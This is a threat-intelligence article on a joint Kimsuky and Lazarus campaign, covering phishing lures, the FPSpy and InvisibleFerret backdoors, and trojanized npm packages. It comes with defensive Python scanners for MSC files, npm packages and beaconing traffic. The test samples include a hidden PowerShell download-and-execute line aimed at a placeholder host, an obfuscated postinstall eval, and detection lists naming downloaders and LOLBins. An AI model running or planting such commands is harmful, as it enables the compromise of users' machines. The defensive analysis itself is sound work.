
Two of North Korea’s most dangerous hacking groups have joined forces to launch a coordinated attack campaign that threatens organizations worldwide.
The Kimsuky and Lazarus groups are working together to steal sensitive intelligence and cryptocurrencies through a systematic approach that combines social engineering with zero-day exploitation.
This partnership represents a major shift in how state-sponsored threat actors operate, moving from isolated attacks to carefully coordinated operations.
The campaign begins with Kimsuky conducting reconnaissance through carefully crafted phishing emails disguised as academic conference invitations or research collaboration requests.
These messages carry malicious attachments in HWP (Hangul Word Processor) or MSC (Microsoft Management Console snap-in) format that deploy the FPSpy backdoor when opened. Once installed, the backdoor activates a keylogger called KLogEXE that captures passwords, email content, and system information.
This intelligence gathering phase maps out the target’s network architecture and identifies valuable assets before handing off control to Lazarus.
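An MSC attachment is plain XML, which makes the lure described above easy to triage before anyone double-clicks it. The scanner below is an added example written for this article, not code from the original page or from the researchers cited; the two console files it scans are constructed, and the element names in them (ConsoleTaskpads, Task, Command, Parameters) are assumptions about where a console file can carry a command line, which is why the scanner walks every text node and attribute instead of a fixed path.

```python
"""Triage an .msc file for embedded commands.

Added example for this article; not code from the original page or from any
of the researchers cited. The MSC samples below are constructed. Real MSC
files are XML; the element and attribute names used here (ConsoleTaskpads,
Task, Command, Parameters) are assumptions about where a console file can
carry a command line, so the scanner inspects every text node and attribute.
"""
import re
import xml.etree.ElementTree as ET

# Tokens an academic-looking console file has no business containing.
# Assumed starting list; tune for the environment.
SUSPICIOUS = [
    (r"\b(powershell|pwsh)(\.exe)?\b", "PowerShell launcher"),
    (r"\b(cmd|mshta|wscript|cscript|rundll32|regsvr32|certutil|bitsadmin)(\.exe)?\b", "LOLBin"),
    (r"https?://", "remote URL"),
    (r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", "encoded command"),
    (r"(javascript|vbscript):", "script URI"),
]

# Constructed sample: a console whose taskpad launches a hidden
# PowerShell download-and-execute. The hostname is an example name.
MALICIOUS_MSC = """<?xml version="1.0"?>
<MMC_ConsoleFile ConsoleVersion="3.0" ProgramMode="Default">
  <StringTables>
    <StringTable ID="1">
      <Strings>
        <String ID="1" Refs="1">Call for Papers - Review Committee</String>
      </Strings>
    </StringTable>
  </StringTables>
  <ConsoleTaskpads>
    <ConsoleTaskpad ID="{11111111-2222-3333-4444-555555555555}" ListSize="1">
      <Tasks>
        <Task Type="CommandLine" Name="Open agenda">
          <Command>cmd.exe</Command>
          <Parameters>/c powershell -w hidden -c "iwr http://conference-review.example/agenda.ps1 | iex"</Parameters>
          <WindowState>Hidden</WindowState>
        </Task>
      </Tasks>
    </ConsoleTaskpad>
  </ConsoleTaskpads>
</MMC_ConsoleFile>
"""

# Constructed sample: a console with no taskpad, as a benign control.
BENIGN_MSC = """<?xml version="1.0"?>
<MMC_ConsoleFile ConsoleVersion="3.0" ProgramMode="Default">
  <StringTables>
    <StringTable ID="1">
      <Strings>
        <String ID="1" Refs="1">Event Viewer (Local)</String>
      </Strings>
    </StringTable>
  </StringTables>
</MMC_ConsoleFile>
"""


def iter_strings(elem, path=""):
    """Yield (location, value) for every attribute and text node under elem."""
    here = f"{path}/{elem.tag}"
    for name, value in elem.attrib.items():
        yield f"{here}@{name}", value
    if elem.text and elem.text.strip():
        yield here, elem.text.strip()
    for child in elem:
        yield from iter_strings(child, here)


def scan_msc(xml_text):
    """Return one finding per string that matches a SUSPICIOUS pattern."""
    root = ET.fromstring(xml_text)
    findings = []
    for where, value in iter_strings(root):
        for pattern, label in SUSPICIOUS:
            if re.search(pattern, value, re.IGNORECASE):
                findings.append({"where": where, "why": label, "value": value})
                break  # one label per string is enough for triage
    return findings


if __name__ == "__main__":
    for sample_name, sample in (("malicious", MALICIOUS_MSC), ("benign", BENIGN_MSC)):
        hits = scan_msc(sample)
        print(f"{sample_name}: {len(hits)} finding(s)")
        for h in hits:
            print(f"  [{h['why']}] {h['where']}: {h['value'][:80]}")
```

Run it over every .msc that arrives by mail; a console file that legitimately ships a taskpad command is rare enough that any hit deserves a human look. HWP attachments are a different format (an OLE container) and need a separate parser, which this example does not attempt.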
CN-SEC security researchers noted that Lazarus then exploits zero-day vulnerabilities to gain deeper access to compromised systems.
The group has weaponized CVE-2024-38193, a use-after-free in the Windows Ancillary Function Driver for WinSock (AFD.sys) that allows local privilege escalation, and pairs it with malicious Node.js packages that appear legitimate.
When a target installs and runs one of these packages, the exploit hands the attackers SYSTEM-level privileges, and they install the InvisibleFerret backdoor, using the FudModule rootkit component to blind endpoint detection tools. The AFD.sys flaw was fixed in Microsoft's August 2024 security updates, so a host that is current on patches closes the privilege-escalation step even if the package itself runs.
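The package side of that chain is the part a development team can check before `npm install` ever runs the code. The audit below is an added example written for this article, not code from the original page or from the actors it describes. It works on an in-memory dict of path to file content standing in for an unpacked tarball (a constructed sample, including a placeholder stage-two that only prints a string), and its indicator lists are assumptions to tune, not a published signature set.

```python
"""Audit an npm package for install-time execution and obfuscated code.

Added example for this article, not code from the original page or from the
tracked threat actors. The package trees below are constructed in-memory
dicts of path -> content standing in for an unpacked tarball, and the
indicator lists are assumptions to tune, not a published signature set.
"""
import base64
import json
import re

# npm runs these automatically during `npm install`; a library rarely needs them.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

CMD_INDICATORS = [
    (r"\bnode\s+-e\b", "inline JavaScript at install time"),
    (r"\b(curl|wget|Invoke-WebRequest|iwr)\b", "downloader in install script"),
    (r"https?://", "remote URL in install script"),
]

SRC_INDICATORS = [
    (r"\beval\s*\(", "eval"),
    (r"new\s+Function\s*\(", "Function constructor"),
    (r"require\(\s*['\"]child_process['\"]\s*\)", "child_process"),
    (r"\.from\(\s*['\"][A-Za-z0-9+/=]{40,}['\"]\s*,\s*['\"]base64['\"]\s*\)", "base64-encoded payload"),
    (r"(\\x[0-9a-fA-F]{2}){8,}", "hex-escaped string"),
]

# Placeholder stage-two (just a console.log); real packages carry a loader here.
_STAGE2 = base64.b64encode(b"console.log('placeholder payload')").decode()

MALICIOUS_PKG = {
    "package.json": json.dumps({
        "name": "conference-toolkit",
        "version": "1.4.2",
        "scripts": {"postinstall": "node scripts/setup.js", "test": "jest"},
    }),
    "scripts/setup.js": (
        "const cp = require('child_process');\n"
        f"const code = Buffer.from('{_STAGE2}', 'base64').toString();\n"
        "eval(code);\n"
    ),
    "index.js": "module.exports = { version: '1.4.2' };\n",
}

BENIGN_PKG = {
    "package.json": json.dumps({
        "name": "left-trim",
        "version": "0.1.0",
        "scripts": {"test": "node test.js"},
    }),
    "index.js": "module.exports = s => s.replace(/^\\s+/, '');\n",
}


def _line_of(text, offset):
    return text.count("\n", 0, offset) + 1


def audit_package(files):
    """Return findings for lifecycle hooks and risky constructs in a package tree."""
    findings = []
    manifest = json.loads(files["package.json"])
    scripts = manifest.get("scripts", {})
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        # The hook itself is worth a look even when its command line is bland:
        # "node scripts/setup.js" tells you nothing about what setup.js does.
        findings.append({"where": f"package.json scripts.{hook}", "why": "lifecycle hook", "value": cmd})
        for pattern, label in CMD_INDICATORS:
            if re.search(pattern, cmd):
                findings.append({"where": f"package.json scripts.{hook}", "why": label, "value": cmd})
    for path, content in files.items():
        if not path.endswith(".js"):
            continue
        for pattern, label in SRC_INDICATORS:
            for m in re.finditer(pattern, content):
                findings.append({"where": f"{path}:{_line_of(content, m.start())}", "why": label,
                                 "value": content[m.start():m.end()][:60]})
    return findings


if __name__ == "__main__":
    for name, tree in (("conference-toolkit", MALICIOUS_PKG), ("left-trim", BENIGN_PKG)):
        hits = audit_package(tree)
        print(f"{name}: {len(hits)} finding(s)")
        for h in hits:
            print(f"  [{h['why']}] {h['where']}: {h['value']}")
```

The cheapest control is still `npm install --ignore-scripts` (or `ignore-scripts=true` in .npmrc) for packages that were never vetted; the audit is for deciding which of them to vet.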
Technical Breakdown of the InvisibleFerret Backdoor
The InvisibleFerret backdoor represents a significant advancement in evasion capabilities. It disguises its network traffic as normal HTTPS web requests, so payload inspection sees nothing unusual and defenders are left with metadata such as connection timing, destination age, and TLS certificate details.
The malware specifically targets blockchain wallets by scanning system memory for private keys and transaction data stored in browser extensions and desktop applications.
In one documented case, attackers transferred $32 million in cryptocurrency within 48 hours without triggering security alerts.
The backdoor communicates with its command-and-control servers over encrypted channels and rotates the C2 domain daily, polling a list of candidate domains. Each C2 domain is dressed up as a legitimate e-commerce or news website to avoid suspicion.
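Traffic that looks like HTTPS and hides behind a shop or news domain still has to check in on a schedule, and a name that changes every day has to lead somewhere. The script below, an added example written for this article rather than code from the page or the cited researchers, scores connection regularity per (source, hostname) pair in proxy logs and then groups the beaconing hostnames by destination IP to expose the rotation. The log lines are constructed (an invented "timestamp src host dst_ip bytes" layout), and the assumption that the rotating names point at one shared server is the author's, not something the article states.

```python
"""Spot a daily-rotating HTTPS beacon in proxy logs.

Added example for this article, not code from the original page or the cited
researchers. The log is constructed: one implant on 10.0.0.12 checks in every
ten minutes, uses a shop-themed hostname on day one and a news-themed one on
day two, and both names point at the same server (203.0.113.7). That the
rotating names share a server is an assumption the second function relies on.
"""
from collections import defaultdict, namedtuple
from datetime import datetime, timedelta, timezone

Rec = namedtuple("Rec", "ts src host dst nbytes")
Beacon = namedtuple("Beacon", "src host hits mean_gap cv first last")


def make_sample_log():
    """Constructed proxy log: two days of beaconing plus bursty human browsing."""
    base = datetime(2024, 9, 1, 9, 0, tzinfo=timezone.utc)
    lines = []
    for day, host in ((0, "shop-dealsdaily.example"), (1, "news-briefing.example")):
        for i in range(24):
            t = base + timedelta(days=day, seconds=600 * i + (i % 3) * 5)  # ~10 min plus jitter
            lines.append(f"{t.isoformat()} 10.0.0.12 {host} 203.0.113.7 843")
    for off in (0, 3, 7, 120, 121, 900, 4000, 4002, 4010, 9000):  # a person reading a site
        t = base + timedelta(seconds=off)
        lines.append(f"{t.isoformat()} 10.0.0.12 www.example-news.example 198.51.100.9 21400")
    return lines


def parse(lines):
    recs = []
    for line in lines:
        ts, src, host, dst, nbytes = line.split()
        recs.append(Rec(datetime.fromisoformat(ts), src, host, dst, int(nbytes)))
    return recs


def find_beacons(recs, min_hits=8, max_cv=0.2):
    """Flag (src, host) pairs whose inter-connection gaps are too regular to be a person.

    cv is the coefficient of variation of the gaps: implants with small jitter
    score near zero, interactive browsing scores well above 1.
    """
    times = defaultdict(list)
    for r in recs:
        times[(r.src, r.host)].append(r.ts)
    out = []
    for (src, host), ts in times.items():
        ts.sort()
        if len(ts) < min_hits:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
        mean = sum(gaps) / len(gaps)
        sd = (sum((g - mean) ** 2 for g in gaps) / len(gaps)) ** 0.5
        cv = sd / mean if mean else float("inf")
        if cv <= max_cv:
            out.append(Beacon(src, host, len(ts), mean, cv, ts[0], ts[-1]))
    return out


def link_rotation(recs, beacons):
    """Group beacons by (src, dst_ip) so a hostname that changes daily still maps to one campaign."""
    dst_of = {(r.src, r.host): r.dst for r in recs}
    groups = defaultdict(list)
    for b in beacons:
        groups[(b.src, dst_of[(b.src, b.host)])].append(b)
    return {k: sorted(v, key=lambda b: b.first) for k, v in groups.items() if len(v) > 1}


if __name__ == "__main__":
    recs = parse(make_sample_log())
    beacons = find_beacons(recs)
    for b in beacons:
        print(f"beacon {b.src} -> {b.host}: {b.hits} hits, mean gap {b.mean_gap:.0f}s, cv {b.cv:.3f}")
    for (src, dst), chain in link_rotation(recs, beacons).items():
        print(f"rotation {src} -> {dst}: " + " -> ".join(b.host for b in chain))
```

Update agents and monitoring probes poll on a schedule too and will score just as low, so the regularity score alone is a triage signal, not a verdict; the rotation grouping (several low-cv hostnames, each alive for about a day, all resolving to one address) is what separates this pattern from a well-behaved poller.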
After completing their objectives, the two groups coordinate through shared infrastructure to remove evidence.
They overwrite their malicious files with legitimate system files and delete the logs that recorded the attack. Organizations in the defense, finance, energy, and blockchain sectors face the highest risk from this campaign.
